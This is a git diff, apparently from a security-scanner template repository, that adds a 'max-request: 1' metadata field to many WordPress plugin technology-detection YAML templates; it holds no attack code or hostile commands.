diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index 0dd8686ec3..cfa2e3d080 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
+    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index 359671f3bd..a92d9bde4e 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
+    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 116e0c420a..59144c7dd5 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
+    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index dc4703ef8d..df06ba2f35 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 1426ac3ef2..2a79d529cc 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
+    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 78d1651ff4..556a113acc 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
+    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index f7219b373d..58d9a9d738 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
+    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index f688a68f72..6c9c485079 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
+    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 00e95c4263..7631e87d78 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
+    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index 212b2b13c4..c7daa26ac6 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
+    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 6318392c5c..68767e4dce 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
+    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index e1a2a186e0..073618936d 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
+    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 23614882a7..6aabc19e9f 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
+    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index 85965337cb..ac80e4f31b 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
+    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 33d903a1b4..15d7a24755 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 3c6f8f287b..40ccc15b27 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
+    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index c3b630cde2..1fad3cee08 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
+    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index 5c8ce709b6..ebe4ee41a7 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
+    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index aea47b9e84..5c32110e0e 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
+    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 78c584c388..09c2e2f360 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
+    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 2c80d09c27..1a2e8beb3e 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
+    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 4b1b3a8754..706145493c 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index 06ad83bdf7..cf6a6ee635 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index b20666268f..c039765929 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index b2a097bfe7..a2c92dff4b 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index c71fa258af..41b5d6c854 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index 5a98e67597..cca31cc3a9 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
+    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index 4463174203..ff9c0a49ce 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
+    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index cfac0b961b..a76d3306bb 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
+    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 846761f2f7..2249681b6d 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
+    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index 0def6e61ca..b5389b27c9 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
+    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 5c5decc127..00d183f507 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
+    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index a8229a338e..451e1daef1 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index 6559e64dce..af30ca76b6 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index a4368b8aa6..93823466d4 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index ec119e762a..e224283ecd 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
+    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index b7ec7576a3..9af8df08a7 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
+    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index c42d679973..d4081474c3 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
+    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index fc44375947..bcbc0707fb 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
+    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index a1616c1741..8b23832297 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index 6cfb8bc272..f0c3e4bc63 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
+    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index 9caaa53263..eab4a0d725 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
+    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 5e6b557952..74c172ac94 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
+    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index c5a665e6f7..f5a63a2ed2 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
+    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index a8b56b5df0..25ca7328ef 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
+    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index 4e20e57107..cb1db5bee6 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
+    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index 6f6a416595..a3207ea16a 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2dd0ef57b5..2a4b772078 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
+    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 11942f4fa4..366205085d 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
+    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 87c2aeb4bd..598f08ce88 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
+    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 3696eefbf7..42cdfb4475 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
+    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index 8bab0a9c3e..a1af263dbd 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
+    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index affd270123..19265f910e 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index 1e6a62e23b..c21d414695 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
+    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
